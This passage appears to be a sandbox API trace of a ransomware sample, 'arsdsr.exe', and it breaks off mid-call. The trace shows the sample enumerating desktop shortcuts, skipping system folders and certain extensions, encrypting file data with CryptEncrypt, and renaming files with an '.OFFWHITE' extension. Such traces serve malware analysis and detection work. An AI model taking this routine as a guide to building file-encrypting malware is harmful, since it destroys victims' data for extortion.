lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0153.528] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x280026, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0153.528] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0153.529] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0153.529] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c279c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83c279c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83c4db20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x7e9, dwReserved0=0x280026, dwReserved1=0x295f070, cFileName="Adobe Reader X.lnk", cAlternateFileName="ADOBER~1.LNK")) returned 1 [0153.529] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2=".") returned 1 [0153.529] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="..") returned 1 [0153.529] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="...") returned 1 [0153.529] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="windows") returned -1 [0153.529] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="$recycle.bin") returned 1 [0153.529] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="rsa") returned -1 [0153.529] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="ntuser.dat") returned -1 [0153.529] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="programdata") returned -1 [0153.529] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="appdata") returned -1 [0153.529] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="program files") returned -1 [0153.529] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="program files (x86)") returned -1 [0153.529] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Desktop\\" | out: lpString1="C:/Users\\Public\\Desktop\\") returned="C:/Users\\Public\\Desktop\\" [0153.529] lstrcatW (in: lpString1="C:/Users\\Public\\Desktop\\", lpString2="Adobe Reader X.lnk" | out: lpString1="C:/Users\\Public\\Desktop\\Adobe Reader X.lnk") returned="C:/Users\\Public\\Desktop\\Adobe Reader X.lnk" [0153.529] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.529] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.529] PathFindExtensionW (pszPath="Adobe Reader X.lnk") returned=".lnk" [0153.529] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0153.529] lstrcmpiW (lpString1=".lnk", lpString2=".log") returned -1 [0153.529] lstrcmpiW (lpString1=".lnk", lpString2=".cab") returned 1 [0153.529] lstrcmpiW (lpString1=".lnk", lpString2=".cmd") returned 1 [0153.529] lstrcmpiW (lpString1=".lnk", lpString2=".com") returned 1 [0153.529] lstrcmpiW (lpString1=".lnk", lpString2=".cpl") returned 1 [0153.529] lstrcmpiW (lpString1=".lnk", lpString2=".ini") returned 1 [0153.529] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0153.529] lstrcmpiW (lpString1=".lnk", lpString2=".url") returned -1 [0153.530] lstrcmpiW (lpString1=".lnk", lpString2=".ttf") returned -1 [0153.530] lstrcmpiW (lpString1=".lnk", lpString2=".mp3") returned -1 [0153.530] lstrcmpiW (lpString1=".lnk", lpString2=".pif") returned -1 [0153.530] lstrcmpiW (lpString1=".lnk", lpString2=".mp4") returned -1 [0153.530] lstrcmpiW (lpString1=".lnk", lpString2=".OFFWHITE") returned -1 [0153.530] lstrcmpiW (lpString1=".lnk", lpString2=".msi") returned -1 [0153.530] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0153.530] GetProcessHeap () returned 0x500000 [0153.530] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543e78 [0153.530] CreateFileW (lpFileName="C:/Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0153.530] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=2025) returned 1 [0153.530] GetProcessHeap () returned 0x500000 [0153.530] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543bc8 [0153.530] GetProcessHeap () returned 0x500000 [0153.530] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543be0 [0153.531] GetProcessHeap () returned 0x500000 [0153.531] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5662b0 [0153.531] GetProcessHeap () returned 0x500000 [0153.531] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5663b8 [0153.531] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.531] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.531] SystemFunction036 (in: RandomBuffer=0x543bc8, RandomBufferLength=0x10 | out: RandomBuffer=0x543bc8) returned 1 [0153.531] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.531] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.531] SystemFunction036 (in: RandomBuffer=0x543be0, RandomBufferLength=0x10 | out: RandomBuffer=0x543be0) returned 1 [0153.531] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.531] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.531] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5662b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5662b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0153.531] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.531] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.531] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5663b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5663b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0153.532] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x7e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.532] SetLastError (dwErrCode=0x0) [0153.532] WriteFile (in: hFile=0xb0, lpBuffer=0x5662b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5662b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0153.557] GetLastError () returned 0x0 [0153.557] GetLastError () returned 0x0 [0153.557] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x8e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.557] WriteFile (in: hFile=0xb0, lpBuffer=0x5663b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5663b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0153.557] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x9e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.557] WriteFile (in: hFile=0xb0, lpBuffer=0x543e78*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x543e78*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0153.558] GetProcessHeap () returned 0x500000 [0153.558] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x7e9) returned 0x525638 [0153.558] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.558] ReadFile (in: hFile=0xb0, lpBuffer=0x525638, nNumberOfBytesToRead=0x7e9, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x525638*, lpNumberOfBytesRead=0x295e540*=0x7e9, lpOverlapped=0x0) returned 1 [0153.558] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.558] WriteFile (in: hFile=0xb0, lpBuffer=0x525638*, nNumberOfBytesToWrite=0x7e9, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525638*, lpNumberOfBytesWritten=0x295e54c*=0x7e9, lpOverlapped=0x0) returned 1 [0153.558] GetProcessHeap () returned 0x500000 [0153.558] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525638 | out: hHeap=0x500000) returned 1 [0153.558] CloseHandle (hObject=0xb0) returned 1 [0153.559] GetProcessHeap () returned 0x500000 [0153.559] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5662b0 | out: hHeap=0x500000) returned 1 [0153.559] GetProcessHeap () returned 0x500000 [0153.559] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5663b8 | out: hHeap=0x500000) returned 1 [0153.559] GetProcessHeap () returned 0x500000 [0153.559] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543bc8 | out: hHeap=0x500000) returned 1 [0153.559] GetProcessHeap () returned 0x500000 [0153.559] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543be0 | out: hHeap=0x500000) returned 1 [0153.559] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\Public\\Desktop\\Adobe Reader X.lnk" | out: lpString1="C:/Users\\Public\\Desktop\\Adobe Reader X.lnk") returned="C:/Users\\Public\\Desktop\\Adobe Reader X.lnk" [0153.559] lstrcatW (in: lpString1="C:/Users\\Public\\Desktop\\Adobe Reader X.lnk", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Public\\Desktop\\Adobe Reader X.lnk.OFFWHITE") returned="C:/Users\\Public\\Desktop\\Adobe Reader X.lnk.OFFWHITE" [0153.559] MoveFileW (lpExistingFileName="C:/Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk"), lpNewFileName="C:/Users\\Public\\Desktop\\Adobe Reader X.lnk.OFFWHITE" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk.offwhite")) returned 1 [0153.561] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x280026, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.561] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0153.561] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0153.561] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0153.561] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0153.561] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0153.562] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0153.562] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0153.562] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0153.562] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0153.562] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0153.562] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0153.562] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Desktop\\" | out: lpString1="C:/Users\\Public\\Desktop\\") returned="C:/Users\\Public\\Desktop\\" [0153.562] lstrcatW (in: lpString1="C:/Users\\Public\\Desktop\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Public\\Desktop\\desktop.ini") returned="C:/Users\\Public\\Desktop\\desktop.ini" [0153.562] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.562] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.562] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0153.562] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0153.568] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0153.568] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0153.569] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0153.569] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0153.569] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0153.569] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0153.569] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7df21ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7df21ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7df21ca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8d1, dwReserved0=0x280026, dwReserved1=0x295f070, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0153.569] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2=".") returned 1 [0153.569] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="..") returned 1 [0153.569] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="...") returned 1 [0153.569] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="windows") returned -1 [0153.569] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="$recycle.bin") returned 1 [0153.569] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="rsa") returned -1 [0153.569] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ntuser.dat") returned -1 [0153.569] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="programdata") returned -1 [0153.569] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="appdata") returned 1 [0153.569] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="program files") returned -1 [0153.569] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="program files (x86)") returned -1 [0153.569] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Desktop\\" | out: lpString1="C:/Users\\Public\\Desktop\\") returned="C:/Users\\Public\\Desktop\\" [0153.569] lstrcatW (in: lpString1="C:/Users\\Public\\Desktop\\", lpString2="Google Chrome.lnk" | out: lpString1="C:/Users\\Public\\Desktop\\Google Chrome.lnk") returned="C:/Users\\Public\\Desktop\\Google Chrome.lnk" [0153.569] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.569] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.569] PathFindExtensionW (pszPath="Google Chrome.lnk") returned=".lnk" [0153.569] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0153.569] lstrcmpiW (lpString1=".lnk", lpString2=".log") returned -1 [0153.569] lstrcmpiW (lpString1=".lnk", lpString2=".cab") returned 1 [0153.569] lstrcmpiW (lpString1=".lnk", lpString2=".cmd") returned 1 [0153.569] lstrcmpiW (lpString1=".lnk", lpString2=".com") returned 1 [0153.570] lstrcmpiW (lpString1=".lnk", lpString2=".cpl") returned 1 [0153.570] lstrcmpiW (lpString1=".lnk", lpString2=".ini") returned 1 [0153.570] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0153.570] lstrcmpiW (lpString1=".lnk", lpString2=".url") returned -1 [0153.570] lstrcmpiW (lpString1=".lnk", lpString2=".ttf") returned -1 [0153.570] lstrcmpiW (lpString1=".lnk", lpString2=".mp3") returned -1 [0153.570] lstrcmpiW (lpString1=".lnk", lpString2=".pif") returned -1 [0153.570] lstrcmpiW (lpString1=".lnk", lpString2=".mp4") returned -1 [0153.570] lstrcmpiW (lpString1=".lnk", lpString2=".OFFWHITE") returned -1 [0153.570] lstrcmpiW (lpString1=".lnk", lpString2=".msi") returned -1 [0153.570] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0153.570] GetProcessHeap () returned 0x500000 [0153.570] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543e88 [0153.570] CreateFileW (lpFileName="C:/Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0153.570] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=2257) returned 1 [0153.570] GetProcessHeap () returned 0x500000 [0153.570] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543be0 [0153.571] GetProcessHeap () returned 0x500000 [0153.571] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543bc8 [0153.571] GetProcessHeap () returned 0x500000 [0153.571] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5663b8 [0153.571] GetProcessHeap () returned 0x500000 [0153.571] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5662b0 [0153.571] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.571] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.571] SystemFunction036 (in: RandomBuffer=0x543be0, RandomBufferLength=0x10 | out: RandomBuffer=0x543be0) returned 1 [0153.571] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.571] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.571] SystemFunction036 (in: RandomBuffer=0x543bc8, RandomBufferLength=0x10 | out: RandomBuffer=0x543bc8) returned 1 [0153.571] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.571] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.571] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5663b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5663b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0153.571] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.571] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.571] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5662b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5662b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0153.572] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x8d1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.572] SetLastError (dwErrCode=0x0) [0153.572] WriteFile (in: hFile=0xb0, lpBuffer=0x5663b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5663b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0153.623] GetLastError () returned 0x0 [0153.623] GetLastError () returned 0x0 [0153.623] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x9d1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.623] WriteFile (in: hFile=0xb0, lpBuffer=0x5662b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5662b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0153.624] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xad1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.624] WriteFile (in: hFile=0xb0, lpBuffer=0x543e88*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x543e88*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0153.624] GetProcessHeap () returned 0x500000 [0153.624] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8d1) returned 0x525638 [0153.624] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.624] ReadFile (in: hFile=0xb0, lpBuffer=0x525638, nNumberOfBytesToRead=0x8d1, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x525638*, lpNumberOfBytesRead=0x295e540*=0x8d1, lpOverlapped=0x0) returned 1 [0153.624] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.624] WriteFile (in: hFile=0xb0, lpBuffer=0x525638*, nNumberOfBytesToWrite=0x8d1, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525638*, lpNumberOfBytesWritten=0x295e54c*=0x8d1, lpOverlapped=0x0) returned 1 [0153.624] GetProcessHeap () returned 0x500000 [0153.624] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525638 | out: hHeap=0x500000) returned 1 [0153.624] CloseHandle (hObject=0xb0) returned 1 [0153.625] GetProcessHeap () returned 0x500000 [0153.625] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5663b8 | out: hHeap=0x500000) returned 1 [0153.625] GetProcessHeap () returned 0x500000 [0153.625] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5662b0 | out: hHeap=0x500000) returned 1 [0153.625] GetProcessHeap () returned 0x500000 [0153.625] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543be0 | out: hHeap=0x500000) returned 1 [0153.625] GetProcessHeap () returned 0x500000 [0153.625] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543bc8 | out: hHeap=0x500000) returned 1 [0153.625] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\Public\\Desktop\\Google Chrome.lnk" | out: lpString1="C:/Users\\Public\\Desktop\\Google Chrome.lnk") returned="C:/Users\\Public\\Desktop\\Google Chrome.lnk" [0153.625] lstrcatW (in: lpString1="C:/Users\\Public\\Desktop\\Google Chrome.lnk", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Public\\Desktop\\Google Chrome.lnk.OFFWHITE") returned="C:/Users\\Public\\Desktop\\Google Chrome.lnk.OFFWHITE" [0153.625] MoveFileW (lpExistingFileName="C:/Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), lpNewFileName="C:/Users\\Public\\Desktop\\Google Chrome.lnk.OFFWHITE" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk.offwhite")) returned 1 [0153.675] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a09a40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0x280026, dwReserved1=0x295f070, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0153.675] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2=".") returned 1 [0153.676] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="..") returned 1 [0153.676] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="...") returned 1 [0153.676] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="windows") returned -1 [0153.676] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="$recycle.bin") returned 1 [0153.676] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="rsa") returned -1 [0153.676] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="ntuser.dat") returned -1 [0153.676] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="programdata") returned -1 [0153.676] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="appdata") returned 1 [0153.676] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="program files") returned -1 [0153.676] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="program files (x86)") returned -1 [0153.676] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Desktop\\" | out: lpString1="C:/Users\\Public\\Desktop\\") returned="C:/Users\\Public\\Desktop\\" [0153.676] lstrcatW (in: lpString1="C:/Users\\Public\\Desktop\\", lpString2="Mozilla Firefox.lnk" | out: lpString1="C:/Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned="C:/Users\\Public\\Desktop\\Mozilla Firefox.lnk" [0153.676] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.676] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.676] PathFindExtensionW (pszPath="Mozilla Firefox.lnk") returned=".lnk" [0153.676] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0153.676] lstrcmpiW (lpString1=".lnk", lpString2=".log") returned -1 [0153.676] lstrcmpiW (lpString1=".lnk", lpString2=".cab") returned 1 [0153.676] lstrcmpiW (lpString1=".lnk", lpString2=".cmd") returned 1 [0153.676] lstrcmpiW (lpString1=".lnk", lpString2=".com") returned 1 [0153.676] lstrcmpiW (lpString1=".lnk", lpString2=".cpl") returned 1 [0153.676] lstrcmpiW (lpString1=".lnk", lpString2=".ini") returned 1 [0153.676] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0153.676] lstrcmpiW (lpString1=".lnk", lpString2=".url") returned -1 [0153.676] lstrcmpiW (lpString1=".lnk", lpString2=".ttf") returned -1 [0153.676] lstrcmpiW (lpString1=".lnk", lpString2=".mp3") returned -1 [0153.676] lstrcmpiW (lpString1=".lnk", lpString2=".pif") returned -1 [0153.676] lstrcmpiW (lpString1=".lnk", lpString2=".mp4") returned -1 [0153.676] lstrcmpiW (lpString1=".lnk", lpString2=".OFFWHITE") returned -1 [0153.676] lstrcmpiW (lpString1=".lnk", lpString2=".msi") returned -1 [0153.676] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0153.676] GetProcessHeap () returned 0x500000 [0153.677] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543e98 [0153.677] CreateFileW (lpFileName="C:/Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0153.677] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: 